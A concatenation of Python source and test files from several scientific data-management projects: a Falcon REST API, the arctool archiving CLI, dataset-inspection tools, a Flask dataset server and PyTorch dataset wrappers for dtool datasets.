def on_get(self, req, resp):
resp.body = json.dumps(LCPConfig().agent_types)
@docstring(source="Agents/PostAgentTypeResource.yml")
def on_post(self, req, resp):
payload = req.media if isinstance(req.media, list) else [req.media]
controller = LCPController()
try:
at_schema = AgentType(many=True)
d = at_schema.validate(payload)
if d[1] == False:
raise ValidationError("Not acceptable")
for e in payload:
controller.set_agent_type(e)
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
req.status = HTTP_NOT_ACCEPTABLE
class AgentTypeResourcebyId(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/type/{id}',
def __init__(self):
pass
@docstring(source="Agents/PutAgentTypeResource.yml")
def on_put(self, req, resp, id):
req.status = HTTP_NOT_FOUND
@docstring(source="Agents/DeleteAgentTypeResource.yml")
def on_delete(self, req, resp, id):
req.status = HTTP_NOT_FOUND
```
#### File: lcp/resource/self_data.py
```python
from extra.lcp_config import LCPConfig
from docstring import docstring
from resource.base import Base_Resource
from schema.hardware_definitions import BaremetalServer as BaremetalServerSchema
from schema.hardware_definitions import ExecutionEnvironment
from lib.http import HTTP_Method
from falcon import HTTP_NOT_ACCEPTABLE, HTTP_CREATED, HTTP_NOT_FOUND, HTTP_INTERNAL_SERVER_ERROR
from marshmallow import ValidationError
from schema.lcp_schemas import LCPDescription
import json
from extra.hw_helpers.host_info import HostInfoToLcpHelper
from extra.controller import LCPController
class DescribeDeployment(Base_Resource):
tag = {'name': 'self',
'description': 'This method does the initial configuration'}
routes = '/self/deployment',
@docstring(source="self/self_deployment.yaml")
def on_get(self, req, resp):
lcp_config = LCPConfig()
r = {"executionType": lcp_config.exec_env_type, "environment": lcp_config.deployment}
resp.body = json.dumps(r)
@docstring(source="self/post_self_deployment.yaml")
def on_post(self, req, resp):
resp_Data, valid = ExecutionEnvironment(method=HTTP_Method.GET) \
.validate(req.media)
payload = req.media
try:
cfg = LCPConfig()
ee_schema = ExecutionEnvironment(many=False)
ee_schema.load(payload)
cfg.setDeployment(payload)
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
req.status = HTTP_NOT_ACCEPTABLE
class DescribeSelf(Base_Resource):
data = {}
tag = {'name': 'self',
'description': 'Returns description of self LCP.'}
routes = '/self',
@docstring(source="self/get.yaml")
def on_get(self, req, resp):
# TODO: Organizar este codigo bien, con el esquema que corresponda!
resp_Data, valid = BaremetalServerSchema(method=HTTP_Method.GET) \
.validate(data={})
lcp = json.dumps(LCPConfig().lcp)
if lcp == "null":
resp.body = None
resp.status = HTTP_NOT_FOUND
else:
resp.body = lcp
payload = req.media if isinstance(req.media, list) else [req.media]
class InitialSelfConfiguration(Base_Resource):
data = {}
tag = {'name': 'self',
'description': 'Initial configuration for the LCP'}
routes = '/self/configuration',
@docstring(source="self/post.yaml")
def on_post(self, req, resp):
resp_Data, valid = LCPDescription(method=HTTP_Method.POST) \
.validate(data={})
payload = req.media
try:
controller = LCPController()
ic_schema = LCPDescription(many=False)
ic_schema.load(payload)
res = controller.set_self_initial_configuration(payload)
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
resp.status = HTTP_NOT_ACCEPTABLE
```
#### File: lcp/test/cloud_infrastructure_test.py
```python
from falcon import testing
from api import api
from reader.arg import Arg_Reader
from about import project, title, version
import os
import json
from schema.cloudschema import CloudSchema
from resource.cloud_resource import CloudInfrastructure
from resource.software_definition import SoftwareDefinition as SoftwareDefinitionResource
from marshmallow.exceptions import ValidationError
from test_utils import *
from test.testbase import LCPTestBase
class TestMyApp(LCPTestBase):
def _getSecurityFucntionExample(self):
json_file = os.path.dirname(__file__) + \
"/examples/security-function-example.json"
with open(json_file) as f:
file_data = f.read()
return json.loads(file_data)
def test_cloud_infrastructure(self):
cl_dict = loadExampleFile("cloud-infrastructure-example.json")
cloud_schema = CloudSchema(many=False)
try:
d = cloud_schema.load(cl_dict)
assert True
except ValidationError as ve:
print(ve)
assert False
def test_get_cloud_infrastructure(self):
cl_dict = loadExampleFile("cloud-infrastructure-example.json")
headers = getAuthorizationHeaders()
CloudInfrastructure.data = []
result = self.simulate_get("/cloud", headers=headers)
assert (result.status == "200 OK")
body = result.json
assert (type(body) is list)
assert len(body) == 0
CloudInfrastructure.data.append(cl_dict)
result = self.simulate_get("/cloud", headers=headers)
assert result.status == "200 OK"
body = result.json
assert type(body) is list
assert len(body) == 1
try:
cloud_schema = CloudSchema(many=True)
cloud_schema.load(body)
assert True
except ValidationError as ve:
print(ve)
assert False
```
#### File: lcp/test/testbase.py
```python
from utils.log import Log
from falcon import testing
from api import api
from reader.arg import Arg_Reader
from about import title, version
from extra.lcp_config import LCPConfig
from extra.clients_starter import end_client_threads
class LCPTestBase(testing.TestCase):
log = None
def setUp(self):
super(LCPTestBase, self).setUp()
LCPConfig.__drop_it__("examples/LCPConfig.yaml")
lcp = LCPConfig()
lcp.reset()
lcp.testing = True
self.db = Arg_Reader.read()
if LCPTestBase.log is None:
Log.init(config="../"+self.db.log_config)
LCPTestBase.log = Log.get('api')
self.app = api(title=title, version=version)
def tearDown(self) -> None:
end_client_threads()
```
#### File: lcp/utils/json.py
```python
import json
from datetime import datetime
def __converter(obj):
if isinstance(obj, datetime):
return obj.__str__()
def dumps(data, *args, **kwargs):
return json.dumps(data, *args, default=__converter, **kwargs)
def loads(data, *args, **kwargs):
return json.loads(data, *args, **kwargs)
``` |
{
"source": "jicarretero/SimpleDataModelsImplementation",
"score": 2
} |
#### File: GuardAgent/swagger_client/GuardAgentSecurityContext.py
```python
class GuardAgentSecurityContext(object):
class __GuardAgentSecurityContext:
def __init__(self):
# self._time_between_probes=Configuration("time_between_probes", "int", "Time consumed between probing in seconds", "60")
# self._time_between_pings=Configuration("time_between_pings","int", "time ellapsed between two pings in seconds", "60")
# self.configurations=Configurations([self._time_between_probes, self._time_between_pings])
pass
def to_dict(self):
return self.configurations.to_dict()
def to_str(self):
return self.configurations.to_str()
def time_between_probes(self,tbp: int=None):
if tbp is None:
return int(self._time_between_probes._value)
else:
self._time_between_probes._value = str(tbp)
def time_between_pings(self,tbp: int=None):
if tbp is None:
return int(self._time_between_pings._value)
else:
self._time_between_pings._value = str(tbp)
instance=None
def __new__(cls, *args, **kwargs):
if GuardAgentSecurityContext.instance is None:
GuardAgentSecurityContext.instance = GuardAgentSecurityContext.__GuardAgentSecurityContext()
return GuardAgentSecurityContext.instance
def __getattr__(self, name):
return getattr(self.instance, name)
def __setattr__(self, name):
return setattr(self.instance, name)
``` |
{
"source": "JIC-CSB/arctool",
"score": 2
} |
#### File: arctool/arctool/cli.py
```python
import sys
import os
import getpass
import click
from dtool import (
DataSet,
Project,
DtoolTypeError,
NotDtoolObject,
)
from arctool import __version__
from arctool.utils import (
README_SCHEMA,
readme_yml_is_valid,
new_archive_dataset,
)
from arctool.archive import (
ArchiveDataSet,
ArchiveFile,
ArchiveFileBuilder,
compress_archive,
)
from arctool.slurm import generate_slurm_script
from dtool.clickutils import create_project, generate_descriptive_metadata
from fluent import sender
logger = sender.FluentSender('arctool', host='v0679', port=24224)
@click.group()
@click.version_option(version=__version__)
@click.option('--fluentd-host', envvar='FLUENTD_HOST', default='v0679')
def cli(fluentd_host):
logger = sender.FluentSender('arctool', host=fluentd_host, port=24224)
message = {'api-version': __version__,
'command_line': sys.argv,
'unix_username': getpass.getuser()}
logger.emit('cli_command', message)
@cli.group(invoke_without_command=True)
@click.pass_context
@click.option('--staging_path',
help='Path to staging area where new project will be created',
default='.',
type=click.Path(exists=True))
def new(ctx, staging_path):
# ctx is passed in via @click.pass_context
# Makes default behaviour for 'arctool new' be create dataset
if ctx.invoked_subcommand is None:
try:
project = Project.from_path(staging_path)
project_path = staging_path
except NotDtoolObject:
project = create_project(staging_path)
project_path = os.path.join(staging_path, project.name)
except DtoolTypeError:
raise(click.UsageError("Don't create a project in a dataset"))
cli_new_dataset(project_path)
@new.command()
@click.option('--staging_path',
help='Path to staging area where new project will be created',
default='.',
type=click.Path(exists=True))
def project(staging_path):
create_project(staging_path)
@new.command()
@click.option('--staging_path',
help='Path to staging area where new archive will be created',
default='.',
type=click.Path(exists=True))
def dataset(staging_path):
cli_new_dataset(staging_path)
def cli_new_dataset(staging_path):
staging_path = os.path.abspath(staging_path)
click.secho('Starting new archive in: ', nl=False)
click.secho(staging_path, fg='green')
logger.emit('pre_new_archive', {'staging_path': staging_path})
descriptive_metadata = generate_descriptive_metadata(
README_SCHEMA, staging_path)
dataset, dataset_path, readme_path = new_archive_dataset(
staging_path, descriptive_metadata)
click.secho('Created new archive in: ', nl=False)
click.secho(dataset_path, fg='green')
log_data = {'metadata': descriptive_metadata,
'archive_path': dataset_path,
'dataset_uuid': dataset.uuid}
logger.emit('new', log_data)
archive_data_path = os.path.join(dataset_path, dataset.data_directory)
click.secho('Now:')
click.secho(' 1. Edit {}'.format(readme_path), fg='yellow')
click.secho(' 2. Move archive data into {}'.format(archive_data_path),
fg='yellow')
click.secho('Then: ', nl=False)
click.secho('arctool manifest create {}'.format(dataset_path),
fg='cyan')
@cli.group()
def manifest():
pass
@manifest.command()
@click.argument('path', 'Path to archive dataset directory.',
type=click.Path(exists=True))
def create(path):
archive_dataset = ArchiveDataSet.from_path(path)
log_data = {'uuid': archive_dataset.uuid, 'path': path}
logger.emit('pre_create_manifest', log_data)
archive_dataset.update_manifest()
click.secho('Created manifest', fg='green')
log_data = {'uuid': archive_dataset.uuid,
'manifest': archive_dataset.manifest}
logger.emit('post_create_manifest', log_data)
click.secho('Next: ', nl=False)
click.secho('arctool archive create {}'.format(path), fg='cyan')
@cli.group()
def archive():
pass
@archive.command() # NOQA
@click.argument('path', 'Path to dataset directory.',
type=click.Path(exists=True))
def create(path):
path = os.path.abspath(path)
dataset = DataSet.from_path(path)
log_data = {'path': path,
'dataset_uuid': dataset.uuid}
logger.emit('pre_create_archive', log_data)
readme_path = dataset.abs_readme_path
click.secho('Validating readme at: ', nl=False)
click.secho(readme_path, fg='green')
readme_str = open(readme_path, "r").read()
if not readme_yml_is_valid(readme_str):
click.secho("Not valid", fg='red')
sys.exit(2)
archive_builder = ArchiveFileBuilder.from_path(path)
hacked_path = os.path.join(path, "..")
tar_file_path = archive_builder.persist_to_tar(hacked_path)
# tar_file_path = dtool.arctool.initialise_archive(path)
# def show_func(item):
# if item is None:
# return ''
# return str(item['path'])
# with click.progressbar(manifest_filedict,
# length=tot_size,
# item_show_func=show_func) as bar:
# for entry in bar:
# rpath = os.path.join('archive', entry['path'])
# append_to_tar_archive(path, rpath)
# bar.update(entry['size'])
click.secho('Archiving data at: ', nl=False)
click.secho(path, fg='green')
click.secho('Created archive: ', nl=False)
click.secho(tar_file_path, fg='green')
archive_size = os.stat(tar_file_path).st_size
post_tar_log = {'dataset_uuid': dataset.uuid,
'archive_size': archive_size,
'output_tar_path': tar_file_path}
logger.emit('post_create_archive', post_tar_log)
click.secho('Next: ', nl=False)
click.secho('arctool archive compress {}'.format(tar_file_path), fg='cyan')
@archive.command()
@click.option('--cores', '-c', default=4, help='Number of CPU cores to use.')
@click.option('--slurm', '-s', is_flag=True, default=False,
help='Rather than running compression, generate SLURM script.')
@click.argument('path', 'Path to uncompressed archive (tar) file.',
type=click.Path(exists=True))
def compress(path, cores, slurm):
path = os.path.abspath(path)
archive = ArchiveFile.from_file(path)
if not slurm:
click.secho('Compressing archive: ', nl=False)
click.secho(path, fg='green')
pre_log = {'dataset_uuid': archive.admin_metadata["uuid"],
'archive_path': path,
'cores': cores,
'tar_size': os.stat(path).st_size}
logger.emit('pre_compress_archive', pre_log)
compressed_archive_path = compress_archive(path, n_threads=cores)
click.secho('Created compressed file: ', nl=False)
click.secho(compressed_archive_path, fg='green')
post_log = {'dataset_uuid': archive.admin_metadata["uuid"],
'compressed_archive_path': compressed_archive_path,
'gzip_size': os.stat(compressed_archive_path).st_size}
logger.emit('post_compress_archive', post_log)
click.secho('Now:')
click.secho(' Move {} to archive storage'.format(
compressed_archive_path), fg='yellow')
# WARNING - be VERY careful automating this to submit the job - if the
# logic fails, the job will repeatedly submit itself forever!
else:
job_parameters = dict(n_cores=cores, partition="rg-sv")
command_string = "arctool archive compress -c {} {}".format(cores,
path)
submit_string = generate_slurm_script(command_string, job_parameters)
print(submit_string)
@cli.group()
def verify():
pass
@verify.command()
@click.argument('path', 'Path to compressed archive.',
type=click.Path(exists=True))
def summary(path):
archive_file = ArchiveFile.from_file(path)
summary_data = archive_file.summarise()
size_in_gibi = float(summary_data['total_size']) / (2 ** 30)
click.secho("Archive contains", nl=False)
click.secho(" {} ".format(summary_data['n_files']), fg='green', nl=False)
click.secho("files.")
click.secho("Total uncompressed archive size is", nl=False)
click.secho(" {:.2f} GiB".format(size_in_gibi), fg='green', nl=False)
click.secho(".")
@verify.command()
@click.argument('path', 'Path to compressed archive.',
type=click.Path(exists=True))
def full(path):
click.secho("Performing full verification on:", nl=False)
click.secho(" {}".format(path), fg='green')
archive_file = ArchiveFile.from_path(path)
result = archive_file.verify_all()
click.secho("Verification ", nl=False)
if result:
click.secho("passed", fg='green')
else:
click.secho("failed", fg='red')
if __name__ == "__main__":
cli()
```
#### File: arctool/tests/__init__.py
```python
import os
import shutil
import tempfile
from distutils.dir_util import copy_tree
import contextlib
import pytest
from dtool import DescriptiveMetadata
_HERE = os.path.dirname(__file__)
TEST_INPUT_DATA = os.path.join(_HERE, "data", "basic", "input")
TEST_DESCRIPTIVE_METADATA = DescriptiveMetadata([
("project_name", u"my_project"),
("dataset_name", u"brassica_rnaseq_reads"),
("confidential", False),
("personally_identifiable_information", False),
("owner_name", u"<NAME>"),
("owner_email", u"<EMAIL>"),
("unix_username", u"namey"),
("archive_date", u"2017-01-01"),
])
@contextlib.contextmanager
def remember_cwd():
cwd = os.getcwd()
try:
yield
finally:
os.chdir(cwd)
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_archive(request):
from arctool.archive import (
ArchiveDataSet,
ArchiveFileBuilder)
from arctool.archive import compress_archive
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
archive_directory_path = os.path.join(d, "brassica_rnaseq_reads")
os.mkdir(archive_directory_path)
archive_ds = ArchiveDataSet("brassica_rnaseq_reads")
archive_ds.persist_to_path(archive_directory_path)
# Move some data into the archive.
archive_input_path = os.path.join(TEST_INPUT_DATA, 'archive')
archive_output_path = os.path.join(archive_directory_path, 'archive')
copy_tree(archive_input_path, archive_output_path)
archive_builder = ArchiveFileBuilder.from_path(archive_directory_path)
tar_path = archive_builder.persist_to_tar(d)
compress_archive(tar_path)
return tar_path + '.gz'
```
#### File: arctool/tests/test_slurm_api.py
```python
def test_generate_slurm_submission_script():
from arctool.slurm import generate_slurm_script
job_parameters = {'n_cores': 8, 'partition': 'rg-sv'}
command_string = "arctool archive compress -c 8 /tmp/staging/mytar.tar"
actual_script = generate_slurm_script(command_string,
job_parameters)
actual = actual_script.split('\n')[-1]
expected = 'arctool archive compress -c 8 /tmp/staging/mytar.tar'
assert expected == actual, (expected, actual)
``` |
{
"source": "JIC-CSB/datademo",
"score": 2
} |
#### File: datademo/datademo/cli.py
```python
import os
import json
import click
import dtool
import pygments
import pygments.lexers
import pygments.formatters
from datademo import __version__
dataset_path_option = click.argument(
'path',
'Path to dataset directory',
default=".",
type=click.Path(exists=True))
project_path_option = click.argument(
'path',
'Path to project directory',
default=".",
type=click.Path(exists=True))
@click.group()
@click.version_option(version=__version__)
def cli():
pass
#############################################################################
# datademo dataset
#############################################################################
@cli.group()
def dataset():
pass
@dataset.command()
@dataset_path_option
def identifiers(path):
dataset = dtool.DataSet.from_path(path)
click.secho("\n".join(dataset.identifiers))
@dataset.command()
@dataset_path_option
def paths(path):
dataset = dtool.DataSet.from_path(path)
paths = [dataset.item_path_from_hash(identifier)
for identifier in dataset.identifiers]
click.secho('\n'.join(paths))
@dataset.command()
@dataset_path_option
def manifest(path):
dataset = dtool.DataSet.from_path(path)
formatted_json = json.dumps(dataset.manifest, indent=2)
colorful_json = pygments.highlight(
formatted_json,
pygments.lexers.JsonLexer(),
pygments.formatters.TerminalFormatter())
click.secho(colorful_json, nl=False)
@dataset.command()
@dataset_path_option
def summary(path):
dataset = dtool.DataSet.from_path(path)
file_list = dataset.manifest["file_list"]
total_size = sum([f["size"] for f in file_list])
json_lines = [
"{",
' "Name": "{}",'.format(dataset.name),
' "Creator": "{}",'.format(dataset.creator_username),
' "Number of files": {},'.format(len(file_list)),
' "Total size": {}'.format(total_size),
"}",
]
formatted_json = "\n".join(json_lines)
colorful_json = pygments.highlight(
formatted_json,
pygments.lexers.JsonLexer(),
pygments.formatters.TerminalFormatter())
click.secho(colorful_json, nl=False)
@dataset.command()
@dataset_path_option
def verify(path):
all_good = True
dataset = dtool.DataSet.from_path(path)
manifest_data_paths = []
for i in dataset.identifiers:
fpath = dataset.item_path_from_hash(i)
manifest_data_paths.append(fpath)
if not os.path.isfile(fpath):
click.secho("Missing file: {}".format(fpath), fg="red")
all_good = False
continue
calculated_hash = dataset._structural_metadata.hash_generator(fpath)
if i != calculated_hash:
click.secho("Altered file: {}".format(fpath), fg="red")
all_good = False
continue
abs_data_directory = os.path.join(path, dataset.data_directory)
existing_data_paths = []
for root, dirs, files in os.walk(abs_data_directory):
for f in files:
fpath = os.path.abspath(os.path.join(root, f))
existing_data_paths.append(fpath)
new_data_fpaths = set(existing_data_paths) - set(manifest_data_paths)
for fpath in new_data_fpaths:
all_good = False
click.secho("Unknown file: {}".format(fpath), fg="yellow")
if all_good:
click.secho("All good :)".format(fpath), fg="green")
#############################################################################
# datademo project
#############################################################################
@cli.group()
def project():
pass
@project.command() # NOQA
@project_path_option
def summary(path): # NOQA
project = dtool.Project.from_path(path)
num_datasets = 0
num_files = 0
tot_size = 0
child_paths = [os.path.join(path, p) for p in os.listdir(path)]
child_dirs = [d for d in child_paths if os.path.isdir(d)]
for d in child_dirs:
try:
dataset = dtool.DataSet.from_path(d)
except (dtool.DtoolTypeError, dtool.NotDtoolObject):
continue
file_list = dataset.manifest["file_list"]
size = sum([f["size"] for f in file_list])
num_datasets += 1
num_files += len(file_list)
tot_size += size
json_lines = [
"{",
' "Name": "{}",'.format(project.descriptive_metadata["project_name"]),
' "Number of datasets": {},'.format(num_datasets),
' "Number of files": {},'.format(num_files),
' "Total size": {}'.format(tot_size),
"}",
]
formatted_json = "\n".join(json_lines)
colorful_json = pygments.highlight(
formatted_json,
pygments.lexers.JsonLexer(),
pygments.formatters.TerminalFormatter())
click.secho(colorful_json, nl=False)
```
#### File: datademo/tests/test_datademo_package.py
```python
def test_version_is_string():
import datademo
assert isinstance(datademo.__version__, str)
```
#### File: datademo/tests/test_datademo_project_cli.py
```python
import subprocess
from . import project_fixture # NOQA
def test_dataset_summary(project_fixture): # NOQA
import json
cmd = ["datademo", "project", "summary", project_fixture]
summary_str = subprocess.check_output(cmd).decode("utf-8")
summary = json.loads(summary_str)
expected = {
"Name": "crop_yield",
"Number of datasets": 3,
"Number of files": 9,
"Total size": 105,
}
assert summary == expected
``` |
{
"source": "JIC-CSB/dirods",
"score": 2
} |
#### File: dirods/tests/__init__.py
```python
import os
import shutil
import tempfile
import pytest
_HERE = os.path.dirname(__file__)
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
``` |
{
"source": "JIC-CSB/dserve",
"score": 2
} |
#### File: dserve/dserve/__init__.py
```python
import os
from flask import (
Flask,
jsonify,
send_file,
abort,
request,
)
from flask_cors import CORS, cross_origin
app = Flask(__name__)
cors = CORS(app)
@app.route("/")
@cross_origin()
def root():
content = {
"_links": {
"self": {"href": "/"},
"items": {"href": "/items"},
"overlays": {"href": "/overlays"}
},
"uuid": app._dataset._admin_metadata["uuid"],
"dtool_version": app._dataset._admin_metadata["dtool_version"],
"name": app._dataset._admin_metadata["name"],
"creator_username": app._dataset._admin_metadata["creator_username"],
}
return jsonify(content)
def items_root():
items = []
for i in app._dataset.manifest["file_list"]:
item = {
"_links": {"self": {"href": "/items/{}".format(i["hash"])}},
"identifier": i["hash"],
}
items.append(item)
content = {
"_links": {
"self": {"href": "/items"},
},
"_embedded": {
"items": items,
}
}
return jsonify(content)
def specific_item(identifier):
try:
app._dataset.item_from_identifier(identifier)
except KeyError:
abort(404)
content = {
"_links": {
"self": {"href": "/items/{}".format(identifier)},
"content": {"href": "/items/{}/raw".format(identifier)},
"overlays": {"href": "/items/{}/overlays".format(identifier)},
},
}
overlays = app._dataset.access_overlays()
for overlay_name, overlay in overlays.items():
content[overlay_name] = overlay[identifier]
return jsonify(content)
@app.route("/items")
@app.route("/items/<identifier>")
@cross_origin()
def items(identifier=None):
if identifier is None:
return items_root()
else:
return specific_item(identifier)
@app.route("/items/<identifier>/raw")
@cross_origin()
def raw_item(identifier):
try:
item = app._dataset.item_from_identifier(identifier)
except KeyError:
abort(404)
item_path = os.path.join(
app._dataset._abs_path,
app._dataset.data_directory,
item["path"]
)
return send_file(item_path, item["mimetype"])
@app.route("/items/<identifier>/overlays")
@cross_origin()
def item_overlays(identifier):
try:
app._dataset.item_from_identifier(identifier)
except KeyError:
abort(404)
content = {
"_links": {
"self": {"href": "/items/{}/overlays".format(identifier)},
},
}
overlays = app._dataset.access_overlays()
for overlay_name in overlays.keys():
href = "/overlays/{}/{}".format(overlay_name, identifier)
content["_links"][overlay_name] = {"href": href}
return jsonify(content)
@app.route("/overlays/<overlay>/<identifier>", methods=["GET", "PUT"])
@cross_origin()
def item_overlay_content(overlay, identifier):
overlays = app._dataset.access_overlays()
try:
requested_overlay = overlays[overlay]
requested_overlay[identifier]
except KeyError:
abort(404)
if request.method == "PUT":
if not request.is_json:
abort(422)
new_value = request.get_json()
requested_overlay[identifier] = new_value
try:
app._dataset.persist_overlay(
overlay, requested_overlay, overwrite=True)
except KeyError:
abort(405)
return "", 201
elif request.method == "GET":
value = requested_overlay[identifier]
return jsonify(value)
def overlay_root():
overlays = app._dataset.access_overlays()
content = {
"_links": {
"self": {"href": "/overlays"}},
}
for overlay_name in overlays.keys():
value = {"href": "/overlays/{}".format(overlay_name)}
content["_links"][overlay_name] = value
return jsonify(content)
def specific_overlay(overlay_name):
overlays = app._dataset.access_overlays()
try:
overlay = overlays[overlay_name]
except KeyError:
abort(404)
return jsonify(overlay)
def creaate_new_overlay(overlay_name):
empty_overlay = app._dataset.empty_overlay()
try:
app._dataset.persist_overlay(overlay_name, empty_overlay)
except IOError:
abort(409)
return "", 201
@app.route("/overlays")
@app.route("/overlays/<overlay_name>", methods=["GET", "PUT"])
@cross_origin()
def overalys(overlay_name=None):
if overlay_name is None:
return overlay_root()
else:
if request.method == "PUT":
return creaate_new_overlay(overlay_name)
elif request.method == "GET":
return specific_overlay(overlay_name)
``` |
{
"source": "JIC-CSB/dtoolai",
"score": 3
} |
#### File: dtoolai/dtoolai/data.py
```python
import logging
import torch.utils.data
import dtoolcore
import numpy as np
from PIL import Image
class WrappedDataSet(torch.utils.data.Dataset):
"""Subclass of pytorch Dataset that provides dtool DataSet methods.
This class mostly provides methods that consumers of DataSets require, and
passes those methods onto its internal DataSet object.
Args:
uri: URI for enclosed dtool DataSet.
"""
def __init__(self, uri):
self.dataset = dtoolcore.DataSet.from_uri(uri)
def put_overlay(self, overlay_name, overlay):
self.dataset.put_overlay(overlay_name, overlay)
def get_annotation(self, annotation_name):
return self.dataset.get_annotation(annotation_name)
@property
def name(self):
return self.dataset.name
@property
def uri(self):
return self.dataset.uri
@property
def uuid(self):
return self.dataset.uuid
def scaled_float_array_to_pil_image(array):
"""Convert an array of floats to a PIL image.
Args:
array (np.ndarray): Array representing an image. Expected to be float
and normalised between 0 and 1.
Returns:
A PIL Image object created from the array
"""
intarray = (255 * array).astype(np.uint8)
if len(array.shape) > 3:
raise ValueError(f"Can't handle array of shape {array.shape}")
if len(array.shape) == 2:
return Image.fromarray(intarray)
elif len(array.shape) == 3:
intarray = np.transpose(intarray, (1, 2, 0))
channels = intarray.shape[2]
if channels == 1:
return Image.fromarray(intarray.squeeze())
elif channels == 3:
return Image.fromarray(intarray)
else:
raise ValueError(f"Can't handle image with {channels} channels")
else:
raise ValueError(f"Can't handle array with shape {array.shape}")
def coerce_to_fixed_size_rgb(im, target_dim):
"""Convert a PIL image to a fixed size and 3 channel RGB format."""
if im.mode not in ['RGB', 'L']:
raise Exception(f"Unknown image mode: {im.mode}")
resized_im = im.resize(target_dim)
if im.mode is 'RGB':
return resized_im
return resized_im.convert('RGB')
class ImageDataSet(WrappedDataSet):
"""Class allowing a collection of images annotated with categories to be
used as both a Pytorch Dataset and a dtool DataSet."""
def __init__(self, uri, usetype='train'):
super().__init__(uri)
self.loaded_images = {}
self.cat_lookup = self.dataset.get_overlay('category')
self.cat_encoding = self.dataset.get_annotation('category_encoding')
self.image_dim = 256, 256
try:
usetype_overlay = self.dataset.get_overlay('usetype')
self.identifiers = [
idn for idn in self.dataset.identifiers
if usetype_overlay[idn] == usetype
]
except dtoolcore.DtoolCoreKeyError:
self.identifiers = self.dataset.identifiers
self.idn_lookup = {n: idn for n, idn in enumerate(self.identifiers)}
def __len__(self):
return len(self.identifiers)
def __getitem__(self, index):
idn = self.idn_lookup[index]
if idn not in self.loaded_images:
logging.debug(f"Loading {self.dataset.item_content_abspath(idn)}")
im = Image.open(self.dataset.item_content_abspath(idn))
resized_converted = coerce_to_fixed_size_rgb(im, self.image_dim)
channels_first = np.moveaxis(np.array(resized_converted), 2, 0)
self.loaded_images[idn] = channels_first.astype(np.float32) / 255
return self.loaded_images[idn], self.cat_encoding[self.cat_lookup[idn]]
@property
def input_channels(self):
return 3
@property
def dim(self):
return self.image_dim[0]
class TensorDataSet(WrappedDataSet):
"""Class that allows numpy arrays to be accessed as both a pytorch
Dataset and a dtool DataSet."""
def __init__(self, uri):
super().__init__(uri)
tensor_file_idn = self.dataset.get_annotation("tensor_file_idn")
npy_fpath = self.dataset.item_content_abspath(tensor_file_idn)
self.X = np.load(npy_fpath, mmap_mode=None)
labels_idn = dtoolcore.utils.generate_identifier("labels.npy")
labels_fpath = self.dataset.item_content_abspath(labels_idn)
self.y = np.load(labels_fpath, mmap_mode=None)
self.image_dim = self.dataset.get_annotation("image_dimensions")
self.tensor = self.X
self.labels = self.y
def __len__(self):
return self.tensor.shape[0]
def __getitem__(self, index):
raw = self.tensor[index]
scaledfloat = raw.astype(np.float32) / 255
label = self.labels[index]
return scaledfloat.reshape(*self.image_dim), int(label)
@property
def input_channels(self):
"""The number of channels each tensor provides."""
return self.image_dim[0]
@property
def dim(self):
"""The linear dimensions of the tensor, e.g. it is dim x dim in shape.
"""
return self.image_dim[1]
def create_tensor_dataset_from_arrays(
output_base_uri, output_name, data_array, label_array, image_dim, readme_content
):
"""Create a dtool DataSet with the necessary annotations to be used as a
TensorDataSet.
Args:
output_base_uri: The base URI where the dataset will be created.
output_name: The name for the output dataset.
data_array (ndarray): The numpy array holding data.
label_array (ndarray): The numpy array holding labels.
image_dim (tuple): Dimensions to which input images should be reshaped.
readme_content (string): Content that will be used to create README.yml
in the created dataset.
Returns:
URI: The URI of the created dataset
"""
with dtoolcore.DataSetCreator(output_name, output_base_uri) as qds:
data_fpath = qds.prepare_staging_abspath_promise('data.npy')
np.save(data_fpath, data_array)
labels_fpath = qds.prepare_staging_abspath_promise('labels.npy')
np.save(labels_fpath, label_array)
data_idn = dtoolcore.utils.generate_identifier('data.npy')
qds.put_annotation("tensor_file_idn", data_idn)
qds.put_annotation("image_dimensions", image_dim)
qds.put_annotation("dtoolAI.inputtype", "TensorDataSet")
qds.put_readme(readme_content)
return qds.uri
```
#### File: scripts/utils/copy_annotation.py
```python
import click
import dtoolcore
@click.command()
@click.argument('source_ds_uri')
@click.argument('dest_ds_uri')
@click.argument('annotation_name')
def main(source_ds_uri, dest_ds_uri, annotation_name):
source_ds = dtoolcore.DataSet.from_uri(source_ds_uri)
dest_ds = dtoolcore.DataSet.from_uri(dest_ds_uri)
annotation = source_ds.get_annotation(annotation_name)
dest_ds.put_annotation(annotation_name, annotation)
if __name__ == "__main__":
main()
```
#### File: scripts/utils/summarise_tensor_dataset.py
```python
from collections import Counter
import click
from dtoolai.data import TensorDataSet
@click.command()
@click.argument('dataset_uri')
def main(dataset_uri):
tds = TensorDataSet(dataset_uri)
print(f"Dataset has {len(tds)} items")
print(Counter(tds.labels))
if __name__ == "__main__":
main()
``` |
{
"source": "JIC-CSB/dtool-cli",
"score": 2
} |
#### File: dtool-cli/tests/test_dtool_cli_module.py
```python
from click.testing import CliRunner
def test_version_is_string():
import dtool_cli
assert isinstance(dtool_cli.__version__, str)
def test_dtool():
from dtool_cli.cli import dtool
runner = CliRunner()
result = runner.invoke(dtool)
assert result.exit_code == 0
``` |
{
"source": "JIC-CSB/dtoolcore",
"score": 2
} |
#### File: dtoolcore/dtoolcore/utils.py
